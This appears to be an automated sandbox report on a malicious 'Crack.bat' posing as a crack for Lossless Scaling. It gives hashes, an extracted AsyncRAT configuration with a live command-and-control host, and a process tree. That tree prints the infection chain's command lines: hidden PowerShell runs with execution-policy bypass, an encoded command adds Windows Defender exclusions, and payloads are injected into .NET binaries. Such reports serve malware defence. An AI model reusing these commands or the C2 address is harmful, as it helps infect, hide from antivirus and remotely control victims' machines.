Analysis

  • max time kernel
    594s
  • max time network
    603s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    25-01-2025 10:42

General

  • Target

    lossless scaling/Crack.bat

  • Size

    16KB

  • MD5

    1f5ea98d27f9d4dfe7da57a12ab5cfb7

  • SHA1

    2565fb81fe31c17562106ab046f9d8a8f1d0b3c5

  • SHA256

    9dba4747cdba2b31fbbcd2c30ef3c71d2e63ae01a8cd1765d385d065bafa21e5

  • SHA512

    3e35d5d4d2212376eeed7be09aaeb6ed200d644ef50122f586a51f130d027f3e54f7af9bd14ba184a0ffe4a13f4cb4dff9e5da776df24f7b710f665aece3dfe4

  • SSDEEP

    192:wA7T3nY6jgx4v7UHKtg+NS+7iASgon5ydpakLNfW9FATzSdcO7lgtVhwqgc8Z+Co:nya1TwSaerstRGj

Malware Config

Extracted

Family

asyncrat

Version

A 14

Botnet

Default

C2

3x3.casacam.net:303

Mutex

MaterxMutex_Egypt2

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Asyncrat family
  • UAC bypass 3 TTPs 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

  • Executes dropped EXE 6 IoCs
  • Uses the VBS compiler for execution 1 TTPs
  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry class 1 IoCs
  • Runs net.exe
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 31 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\lossless scaling\Crack.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2012
    • C:\Windows\system32\net.exe
      net session
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1696
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 session
        3⤵
          PID:1488
      • C:\Windows\system32\xcopy.exe
        xcopy "C:\Users\Admin\AppData\Local\Temp\lossless scaling\\language\en-US" "C:\Users\Public\IObitUnlocker" /E /H /C /I
        2⤵
          PID:4368
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "& {Get-Content 'C:\Users\Public\IObitUnlocker\UK.dll' | Out-String | Invoke-Expression}"
          2⤵
          • UAC bypass
          • Command and Scripting Interpreter: PowerShell
          • Modifies registry class
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3924
          • C:\Windows\system32\schtasks.exe
            "C:\Windows\system32\schtasks.exe" /query /tn administrator
            3⤵
              PID:3280
            • C:\Users\Public\IObitUnlocker\RAR.exe
              "C:\Users\Public\IObitUnlocker\RAR.exe" x -pahmad..123 -o+ C:\Users\Public\IObitUnlocker\EN.dll C:\Users\Public\IObitUnlocker\
              3⤵
              • Executes dropped EXE
              PID:3944
            • C:\Users\Public\IObitUnlocker\BR\Font.exe
              "C:\Users\Public\IObitUnlocker\BR\Font.exe"
              3⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2564
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\esentutl.exe
                "C:\Users\Admin\AppData\Local\Microsoft\Windows\esentutl.exe"
                4⤵
                • Executes dropped EXE
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1544
            • C:\Windows\System32\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\Users\Public\IObitUnlocker\Loader.vbs"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:4632
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass iex([IO.File]::ReadAllText('C:\Users\Public\IObitUnlocker\Report.ps1'))
                4⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious use of SetThreadContext
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:3712
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                  5⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: AddClipboardFormatListener
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of SetWindowsHookEx
                  • Suspicious use of WriteProcessMemory
                  PID:1860
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                    6⤵
                      PID:1468
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                      6⤵
                        PID:1480
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                        6⤵
                          PID:4872
                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                          6⤵
                            PID:4696
                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                            6⤵
                              PID:4776
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\aqtgar.exe"' & exit
                              6⤵
                              • System Location Discovery: System Language Discovery
                              • Suspicious use of WriteProcessMemory
                              PID:124
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\aqtgar.exe"'
                                7⤵
                                • Command and Scripting Interpreter: PowerShell
                                • System Location Discovery: System Language Discovery
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                • Suspicious use of WriteProcessMemory
                                PID:4564
                                • C:\Users\Admin\AppData\Local\Temp\aqtgar.exe
                                  "C:\Users\Admin\AppData\Local\Temp\aqtgar.exe"
                                  8⤵
                                  • Executes dropped EXE
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1424
                      • C:\Windows\system32\schtasks.exe
                        "C:\Windows\system32\schtasks.exe" /query /tn administrator
                        3⤵
                          PID:3668
                      • C:\Windows\system32\mode.com
                        mode con: cols=80 lines=10
                        2⤵
                          PID:1880
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwASABlAGwAcABMAGkAbgBrAFwAQwBlAHIAdABpAGYAaQBjAGEAdABlAC4AZQB4AGUALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAgAC0ARgBvAHIAYwBlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwASABlAGwAcABMAGkAbgBrAFwAQwBlAHIAdABpAGYAaQBjAGEAdABlAC4AZQB4AGUA
                        1⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1812
                      • C:\Users\Admin\AppData\Roaming\HelpLink\Certificate.exe
                        C:\Users\Admin\AppData\Roaming\HelpLink\Certificate.exe
                        1⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:1828
                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
                          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
                          2⤵
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3212
                      • C:\Users\Admin\AppData\Roaming\HelpLink\Certificate.exe
                        C:\Users\Admin\AppData\Roaming\HelpLink\Certificate.exe
                        1⤵
                        • Executes dropped EXE
                        PID:1884

                      Network

                      MITRE ATT&CK Enterprise v15

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Certificate.exe.log

                        Filesize

                        838B

                        MD5

                        b2a93166280809b9da482126a28346f6

                        SHA1

                        13705957ad74170698714cc84624196176610f14

                        SHA256

                        d309ddf505140ba12b7ce857aa7e822f24523b86774d423bf1d74c0cf13ff63d

                        SHA512

                        924f31c62f16074ebce62227b417b5ba038cbb54f39390a722e2f934c939eed4b47e2d8dcc87727337d8ddef70466be905cd2e94b386a91ab1ff35b86f9c96fb

                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                        Filesize

                        3KB

                        MD5

                        22e796539d05c5390c21787da1fb4c2b

                        SHA1

                        55320ebdedd3069b2aaf1a258462600d9ef53a58

                        SHA256

                        7c6c09f48f03421430d707d27632810414e5e2bf2eecd5eb675fecf8b45a9a92

                        SHA512

                        d9cc0cb22df56db72a71504bb3ebc36697e0a7a1d2869e0e0ab61349bda603298fe6c667737b79bf2235314fb49b883ba4c5f137d002e273e79391038ecf9c09

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                        Filesize

                        1KB

                        MD5

                        04e5e186de4751967eef3f5d3c17cff3

                        SHA1

                        da081442582a6e430a63e3a12bac60801807e960

                        SHA256

                        664661d9515153cbac38a6ed188f5672ff00124acb38a5a381cb9faff8720e82

                        SHA512

                        1eb22ccb18bf548f9f6004efac5b9781fd751db162190071dcda31ff0814b9935a75ceeb105f9ad83d5d85381defb208e37525c2d6dc47267287bbc3543db625

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                        Filesize

                        15KB

                        MD5

                        d72c4038f8241d601a283f60bb0f2ee7

                        SHA1

                        f53a5776e6adb415b810041c951d11df6b0196ff

                        SHA256

                        b82722163af3e79fa6585dd50e6dbe91f341f3343065dd6e23955588903b80f3

                        SHA512

                        0d51fc36e862b5af80cc60a05f83a44090d7ee323756fde24b53aa1f9e38cb7df145cf5e96a9ccc87d17c7bde12c343acc543e893b9451700c0b5e2678b1467e

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                        Filesize

                        1KB

                        MD5

                        f1dd882e18628bc3173525f100778a5a

                        SHA1

                        6e108181c7614325af250bc9de0e65731d2b4df6

                        SHA256

                        62d61cb4ea1054e83e384180c604d14304d8baebef3a97605fe4ab1edef8423c

                        SHA512

                        7f4b45e29e39d07e78b0f63b744a5ae9d49036393c58710662248932103b3fde1fba9a04077c6e3ddbd800a12ccc1c9b4aba357f299122dcea369862913b7be1

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\esentutl.exe

                        Filesize

                        156KB

                        MD5

                        6981d94fbcc31ca50551300f5b4a96a3

                        SHA1

                        e38b3a74f2951f5480fb67acc75d41f3e2b4f70e

                        SHA256

                        8c19a90379611efc39c3e96529de2e82a99e3e049d36ef6563ec975836e47811

                        SHA512

                        b94e87c641009ab8206c91ede3e35ab3b65a94fa3be5f4ce7c8a2b17af018f03801086c850427f4d51f4867a3d0a85aaf58ece9fd7f6a36f68df29da430c8d5d

                      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tphes1po.qqd.ps1

                        Filesize

                        60B

                        MD5

                        d17fe0a3f47be24a6453e9ef58c94641

                        SHA1

                        6ab83620379fc69f80c0242105ddffd7d98d5d9d

                        SHA256

                        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                        SHA512

                        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                      • C:\Users\Admin\AppData\Local\Temp\aqtgar.exe

                        Filesize

                        628KB

                        MD5

                        1d53f5a867dd69486834f81a7a490a2d

                        SHA1

                        4154fe5c8e4b1a6141c8ea21b9f1a13ed7a4d91c

                        SHA256

                        f804e0bf63f75b3a11c182054a8f02d4f9d2fb182c3a49b105dece388d8d06a1

                        SHA512

                        769c1e9d9ab34bbd6ff3a0ee06d8e21a64e47861712bf92644a7f9f8d1b035dcf148a6d5d92da16ed82c720b0366e26fb93a0fef91e12a70c1790514bf2fe5c1

                      • C:\Users\Public\IObitUnlocker\BR\Font.exe

                        Filesize

                        434KB

                        MD5

                        68c9ee084cc409309b116ec6aea890a8

                        SHA1

                        efd6aab18a08a63b146ad587d1fa08e0bb19bebc

                        SHA256

                        ef2cbfdfdd874c6c3ea11223b369fbd5f155d20c680ae1e59ac74e6f1bb74a9d

                        SHA512

                        9809477d42df7bbbaea04da5eda4a4f2ae3114b33541a4efd7003bab339d1c6ddf2f9a61b2ba781c0f5de82b030859c8ac76cbe697b296046227c1dc6b547a25

                      • C:\Users\Public\IObitUnlocker\EN.dll

                        Filesize

                        181KB

                        MD5

                        a435e2fb659a3596b017f556b53fa09d

                        SHA1

                        c9ab6229bf239edac73593e0ffb53c1d9bb21686

                        SHA256

                        e7f03b61cff5526877ea3f26f613caf5dbdf9006d49b98c906de3051067d7512

                        SHA512

                        aa3fa16420e66bcdff349ba66791d7849a67d2ae720fdca4b3674ce2a8bffd7a1caae1a306c6533446950b0f8798d6cf7e37ec78ea199252028870fbc742f495

                      • C:\Users\Public\IObitUnlocker\Loader.vbs

                        Filesize

                        308B

                        MD5

                        2993b76e0b0ba015caf654881638a0c0

                        SHA1

                        7fbd5f28fb2f6f948cbeb3c4dd5b0672bdfe4bcd

                        SHA256

                        0e131f595ef67c160de9727d9a92a84b50393e66dd242f330736b916e1bf20a3

                        SHA512

                        a61e0e7f92f0d78c27939ba21bdda6ff97503adc44e42a4b7eab3c4c1bea8acad4517b90db3430cabc237c2db01e60ab3a2a78e237ae01a896bd09aabba067cb

                      • C:\Users\Public\IObitUnlocker\RAR.exe

                        Filesize

                        629KB

                        MD5

                        d3e9f98155c0faab869ccc74fb5e8a1e

                        SHA1

                        8e4feaad1d43306fdd8aa66efa443bca7afde710

                        SHA256

                        3e0fdb5c40336482dacef3496116053d7772a51720900141b3c6f35c6e9b351b

                        SHA512

                        2760c139ef276f406770675d89fb667f3369a9e1943a6eff2c18f391114018ad6fdce9daf0b499b18081ef22243ef04d74ff21cbd346eb31a1ddbcb79756697d

                      • C:\Users\Public\IObitUnlocker\Report.ps1

                        Filesize

                        457KB

                        MD5

                        dd3f962ccc2f5b5f34700307e35138f8

                        SHA1

                        90d80df0ef716260a7d4ed466cf40caf966f0969

                        SHA256

                        e273b5a8cf3d3d37ff676251aa4f41e3726b45b3280f8bf84bf618ca05cca9bb

                        SHA512

                        619fba6cd9b8aae26db23f9cbd6db4870f969abd198d3fe8551703a1e2c46a9d1fd861f7b9462d82581b322209795c1e00762ebe31e0a1383c8a10df8e4a9eae

                      • C:\Users\Public\IObitUnlocker\UK.dll

                        Filesize

                        5KB

                        MD5

                        3fffc04611766c3d49b9f0b74752a2b5

                        SHA1

                        c70e6e3b2cd315e900f6dfdd5828cbf75b903fe5

                        SHA256

                        7537dd03a875384bc79a7a21811e06ca97de3571631fc20b4b86b26baaafad9d

                        SHA512

                        3ded3c5712f93eaa75fc9fe9469a02ece5996b6574d63b7b3a5db86db74762631e35aacae519ea3d23862bdaffab5e786696eeb812b0d1ce7f14b78f4539b4d8

                      • memory/1424-146-0x0000018C79170000-0x0000018C79264000-memory.dmp

                        Filesize

                        976KB

                      • memory/1424-169-0x0000018C79170000-0x0000018C79264000-memory.dmp

                        Filesize

                        976KB

                      • memory/1424-2726-0x0000018C79BA0000-0x0000018C79BF4000-memory.dmp

                        Filesize

                        336KB

                      • memory/1424-2724-0x0000018C792B0000-0x0000018C79306000-memory.dmp

                        Filesize

                        344KB

                      • memory/1424-2725-0x0000018C79A50000-0x0000018C79A9C000-memory.dmp

                        Filesize

                        304KB

                      • memory/1424-160-0x0000018C79170000-0x0000018C79264000-memory.dmp

                        Filesize

                        976KB

                      • memory/1424-164-0x0000018C79170000-0x0000018C79264000-memory.dmp

                        Filesize

                        976KB

                      • memory/1424-121-0x0000018C79170000-0x0000018C79264000-memory.dmp

                        Filesize

                        976KB

                      • memory/1424-148-0x0000018C79170000-0x0000018C79264000-memory.dmp

                        Filesize

                        976KB

                      • memory/1424-149-0x0000018C79170000-0x0000018C79264000-memory.dmp

                        Filesize

                        976KB

                      • memory/1424-127-0x0000018C79170000-0x0000018C79264000-memory.dmp

                        Filesize

                        976KB

                      • memory/1424-156-0x0000018C79170000-0x0000018C79264000-memory.dmp

                        Filesize

                        976KB

                      • memory/1424-120-0x0000018C79170000-0x0000018C79264000-memory.dmp

                        Filesize

                        976KB

                      • memory/1424-136-0x0000018C79170000-0x0000018C79264000-memory.dmp

                        Filesize

                        976KB

                      • memory/1424-139-0x0000018C79170000-0x0000018C79264000-memory.dmp

                        Filesize

                        976KB

                      • memory/1424-133-0x0000018C79170000-0x0000018C79264000-memory.dmp

                        Filesize

                        976KB

                      • memory/1424-137-0x0000018C79170000-0x0000018C79264000-memory.dmp

                        Filesize

                        976KB

                      • memory/1424-123-0x0000018C79170000-0x0000018C79264000-memory.dmp

                        Filesize

                        976KB

                      • memory/1424-165-0x0000018C79170000-0x0000018C79264000-memory.dmp

                        Filesize

                        976KB

                      • memory/1424-157-0x0000018C79170000-0x0000018C79264000-memory.dmp

                        Filesize

                        976KB

                      • memory/1424-153-0x0000018C79170000-0x0000018C79264000-memory.dmp

                        Filesize

                        976KB

                      • memory/1424-141-0x0000018C79170000-0x0000018C79264000-memory.dmp

                        Filesize

                        976KB

                      • memory/1424-161-0x0000018C79170000-0x0000018C79264000-memory.dmp

                        Filesize

                        976KB

                      • memory/1424-167-0x0000018C79170000-0x0000018C79264000-memory.dmp

                        Filesize

                        976KB

                      • memory/1424-172-0x0000018C79170000-0x0000018C79264000-memory.dmp

                        Filesize

                        976KB

                      • memory/1424-173-0x0000018C79170000-0x0000018C79264000-memory.dmp

                        Filesize

                        976KB

                      • memory/1424-175-0x0000018C79170000-0x0000018C79264000-memory.dmp

                        Filesize

                        976KB

                      • memory/1424-177-0x0000018C79170000-0x0000018C79264000-memory.dmp

                        Filesize

                        976KB

                      • memory/1424-188-0x0000018C79170000-0x0000018C79264000-memory.dmp

                        Filesize

                        976KB

                      • memory/1424-181-0x0000018C79170000-0x0000018C79264000-memory.dmp

                        Filesize

                        976KB

                      • memory/1424-179-0x0000018C79170000-0x0000018C79264000-memory.dmp

                        Filesize

                        976KB

                      • memory/1424-131-0x0000018C79170000-0x0000018C79264000-memory.dmp

                        Filesize

                        976KB

                      • memory/1424-125-0x0000018C79170000-0x0000018C79264000-memory.dmp

                        Filesize

                        976KB

                      • memory/1424-151-0x0000018C79170000-0x0000018C79264000-memory.dmp

                        Filesize

                        976KB

                      • memory/1424-130-0x0000018C79170000-0x0000018C79264000-memory.dmp

                        Filesize

                        976KB

                      • memory/1424-118-0x0000018C77370000-0x0000018C77412000-memory.dmp

                        Filesize

                        648KB

                      • memory/1424-119-0x0000018C79170000-0x0000018C79268000-memory.dmp

                        Filesize

                        992KB

                      • memory/1424-143-0x0000018C79170000-0x0000018C79264000-memory.dmp

                        Filesize

                        976KB

                      • memory/1544-78-0x000000001C460000-0x000000001C506000-memory.dmp

                        Filesize

                        664KB

                      • memory/1544-7952-0x00000000015A0000-0x00000000015AC000-memory.dmp

                        Filesize

                        48KB

                      • memory/1544-83-0x000000001C430000-0x000000001C436000-memory.dmp

                        Filesize

                        24KB

                      • memory/1544-82-0x000000001D100000-0x000000001D14C000-memory.dmp

                        Filesize

                        304KB

                      • memory/1544-81-0x000000001C330000-0x000000001C338000-memory.dmp

                        Filesize

                        32KB

                      • memory/1544-80-0x000000001CFA0000-0x000000001D03C000-memory.dmp

                        Filesize

                        624KB

                      • memory/1544-79-0x000000001C9E0000-0x000000001CEAE000-memory.dmp

                        Filesize

                        4.8MB

                      • memory/1860-91-0x0000000007600000-0x000000000760E000-memory.dmp

                        Filesize

                        56KB

                      • memory/1860-93-0x0000000007880000-0x000000000788C000-memory.dmp

                        Filesize

                        48KB

                      • memory/1860-92-0x00000000076F0000-0x000000000770E000-memory.dmp

                        Filesize

                        120KB

                      • memory/1860-90-0x0000000007670000-0x00000000076E6000-memory.dmp

                        Filesize

                        472KB

                      • memory/1860-89-0x0000000006E50000-0x0000000006EB6000-memory.dmp

                        Filesize

                        408KB

                      • memory/1860-85-0x0000000000400000-0x0000000000416000-memory.dmp

                        Filesize

                        88KB

                      • memory/2564-63-0x00000000055B0000-0x00000000055BA000-memory.dmp

                        Filesize

                        40KB

                      • memory/2564-64-0x00000000057E0000-0x0000000005836000-memory.dmp

                        Filesize

                        344KB

                      • memory/2564-49-0x0000000000B20000-0x0000000000B92000-memory.dmp

                        Filesize

                        456KB

                      • memory/2564-52-0x0000000005650000-0x00000000056E2000-memory.dmp

                        Filesize

                        584KB

                      • memory/2564-51-0x0000000005B60000-0x0000000006106000-memory.dmp

                        Filesize

                        5.6MB

                      • memory/2564-50-0x0000000005510000-0x00000000055AC000-memory.dmp

                        Filesize

                        624KB

                      • memory/3712-84-0x0000018F70D70000-0x0000018F70D7A000-memory.dmp

                        Filesize

                        40KB

                      • memory/3924-32-0x00007FFF17353000-0x00007FFF17355000-memory.dmp

                        Filesize

                        8KB

                      • memory/3924-33-0x00007FFF17350000-0x00007FFF17E12000-memory.dmp

                        Filesize

                        10.8MB

                      • memory/3924-27-0x000001A0E9C40000-0x000001A0E9C62000-memory.dmp

                        Filesize

                        136KB

                      • memory/3924-28-0x00007FFF17350000-0x00007FFF17E12000-memory.dmp

                        Filesize

                        10.8MB

                      • memory/3924-48-0x00007FFF17350000-0x00007FFF17E12000-memory.dmp

                        Filesize

                        10.8MB

                      • memory/3924-18-0x00007FFF17353000-0x00007FFF17355000-memory.dmp

                        Filesize

                        8KB

                      • memory/3924-31-0x00007FFF17350000-0x00007FFF17E12000-memory.dmp

                        Filesize

                        10.8MB

                      • memory/3924-29-0x00007FFF17350000-0x00007FFF17E12000-memory.dmp

                        Filesize

                        10.8MB

                      • memory/4564-102-0x0000000005680000-0x00000000056A2000-memory.dmp

                        Filesize

                        136KB

                      • memory/4564-107-0x0000000005E80000-0x00000000061D7000-memory.dmp

                        Filesize

                        3.3MB

                      • memory/4564-109-0x0000000006320000-0x000000000633E000-memory.dmp

                        Filesize

                        120KB

                      • memory/4564-110-0x0000000006410000-0x000000000645C000-memory.dmp

                        Filesize

                        304KB

                      • memory/4564-103-0x0000000005730000-0x0000000005796000-memory.dmp

                        Filesize

                        408KB

                      • memory/4564-111-0x00000000072F0000-0x0000000007386000-memory.dmp

                        Filesize

                        600KB

                      • memory/4564-112-0x0000000006820000-0x000000000683A000-memory.dmp

                        Filesize

                        104KB

                      • memory/4564-96-0x0000000005850000-0x0000000005E7A000-memory.dmp

                        Filesize

                        6.2MB

                      • memory/4564-113-0x0000000006870000-0x0000000006892000-memory.dmp

                        Filesize

                        136KB

                      • memory/4564-95-0x0000000002B30000-0x0000000002B66000-memory.dmp

                        Filesize

                        216KB